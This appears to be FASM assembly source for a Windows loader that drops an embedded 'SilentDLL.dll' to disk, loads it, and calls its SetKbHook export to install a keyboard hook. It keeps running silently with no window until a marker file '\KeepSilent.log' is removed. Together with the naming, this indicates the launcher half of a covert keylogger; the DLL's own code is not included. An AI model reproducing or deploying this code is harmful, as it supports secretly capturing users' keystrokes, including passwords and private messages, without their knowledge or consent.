format PE GUI 4.0 i386
entry EntryPoint

; =================== Equates =====================

CREATE_ALWAYS		  equ 2
FILE_ATTRIBUTE_NORMAL	  equ 080h
GENERIC_READWRITE	  equ 0C0000000h

LMEM_FIXED	       	  equ 0000h

WH_KEYBOARD		  equ 2

WM_CLOSE 		  equ 16
WM_QUIT			  equ 18
WM_DESTROY		  equ 2

section ".text" code readable executable

; ********************** Code *********************

EntryPoint:

	mov ebp, esp
	sub esp, 20

hLib equ ebp-4
exitval equ ebp-8
hHook equ ebp-12
SetKbHook equ ebp-16
RemoveKbHook equ ebp-20

	call dword CreateDLL
	
	push dword _str_SilentDLLName
	call dword [LoadLibrary]
	mov [hLib], eax

	push dword _str_SetKbHook
	push dword [hLib]
	call dword [GetProcAddress]
	mov [SetKbHook], eax

	push dword _str_RemoveKbHook
	push dword [hLib]
	call dword [GetProcAddress]
	mov [RemoveKbHook], eax

	call dword [SetKbHook]

	push dword 0
	push dword FILE_ATTRIBUTE_NORMAL
	push dword CREATE_ALWAYS
	push dword 0
	push dword 0
	push dword GENERIC_READWRITE
	push dword _str_checkfile
	call dword [CreateFile]

	push eax
	call dword [CloseHandle]

	push dword 0
	push dword 1
	push dword 0
	call dword [CreateWaitableTimer]
	mov [_hTimer], eax

.loop_msg:

	push dword _str_checkfile
	call dword [GetFileAttributes]
	cmp eax, 0xFFFFFFFF
	je .end_loop_msg

	push dword 100
	push dword [_hTimer]
	call dword [WaitForSingleObject]

	jmp .loop_msg
	
.end_loop_msg:

	call dword [RemoveKbHook]

	push dword [hLib]
	call dword [FreeLibrary]

	push dword 0
	call dword [ExitProcess]

CreateDLL:

	push ebp
	mov ebp, esp
	sub esp, 20

buffer equ ebp-4
acc equ ebp-8
i equ ebp-12
bytesWritten equ ebp-16
hFile equ ebp-20

	push dword 0
	push dword FILE_ATTRIBUTE_NORMAL
	push dword CREATE_ALWAYS
	push dword 0
	push dword 0
	push dword GENERIC_READWRITE
	push dword _str_SilentDLLName
	call dword [CreateFile]
	mov [hFile], eax
	
	push dword 100h
	push dword LMEM_FIXED
	call dword [LocalAlloc]
	mov [buffer], eax

	mov dword [i], 0

.for_CreateDLL:

	cmp dword [i], SilentDLL_size
	jae .end_for_CreateDLL

	mov eax, SilentDLL_size
	sub eax, [i]
	cmp eax, 100h

	jbe .lbl_notToMuch

	mov eax, 100h

.lbl_notToMuch:

	mov [acc], eax

	push dword 0
	lea eax, [bytesWritten]
	push eax
	push dword [acc]
	mov eax, _SilentDLL_data
	add eax, [i]
	push eax
	push dword [hFile]
	call dword [WriteFile]

	mov eax, [acc]
	add [i], eax
	jmp .for_CreateDLL

.end_for_CreateDLL:

	push dword [buffer]
	call dword [LocalFree]

	push dword [hFile]
	call dword [CloseHandle]

.end:

	add esp, 20
	pop ebp
	ret

; end CreateDLL

; *************** Initialized Data ****************

section ".data" data readable writeable

	_str_SilentDLLName db "SilentDLL.dll", 0
	_str_checkfile db "\KeepSilent.log", 0

	_str_SetKbHook db "SetKbHook", 0
	_str_RemoveKbHook db "RemoveKbHook", 0

	_SilentDLL_data file 'SilentDLL\SilentDLL.dll'
	SilentDLL_size = ($ - _SilentDLL_data)

	_msg:
	times 28 db 0h

	_hTimer dd 0h

; ******************* Import Data ******************

section ".idata" import data readable writeable

	dd 0, 0, 0, rva str_kernel, rva kernel
	dd 0, 0, 0, rva str_user, rva user
	dd 0, 0, 0, 0, 0

	str_kernel db "KERNEL32.DLL", 0
	str_user db "USER32.DLL", 0

	kernel:

		CloseHandle dd rva str_CloseHandle
		CreateFile dd rva str_CreateFile
		CreateWaitableTimer dd rva str_CreateWaitableTimer
		ExitProcess dd rva str_ExitProcess
		FreeLibrary dd rva str_FreeLibrary
		GetFileAttributes dd rva str_GetFileAttributes
		GetProcAddress dd rva str_GetProcAddress
		LoadLibrary dd rva str_LoadLibrary
		LocalAlloc dd rva str_LocalAlloc
		LocalFree dd rva str_LocalFree
		WaitForSingleObject dd rva str_WaitForSingleObject
		WriteFile dd rva str_WriteFile
		dd 0

		str_CloseHandle db 0, 0, "CloseHandle", 0
		str_CreateFile db 0, 0, "CreateFileA", 0
		str_CreateWaitableTimer db 0, 0, "CreateWaitableTimerA", 0
		str_ExitProcess db 0, 0, "ExitProcess", 0
		str_FreeLibrary db 0, 0, "FreeLibrary", 0
		str_GetFileAttributes db 0, 0, "GetFileAttributesA", 0
		str_GetProcAddress db 0, 0, "GetProcAddress", 0
		str_LoadLibrary db 0, 0, "LoadLibraryA", 0
		str_LocalAlloc db 0, 0, "LocalAlloc", 0
		str_LocalFree db 0, 0, "LocalFree", 0
		str_WaitForSingleObject db 0, 0, "WaitForSingleObject", 0
		str_WriteFile db 0, 0, "WriteFile", 0

	user:

		DispatchMessage dd rva str_DispatchMessage
		GetMessage dd rva str_GetMessage
		TranslateMessage dd rva str_TranslateMessage
		dd 0h

		str_DispatchMessage db 0, 0, "DispatchMessageA", 0
		str_GetMessage db 0, 0, "GetMessageA", 0
		str_TranslateMessage db 0, 0, "TranslateMessage", 0

; ****** Fixups, automatically created by fasm ******

section ".reloc" fixups data readable discardable
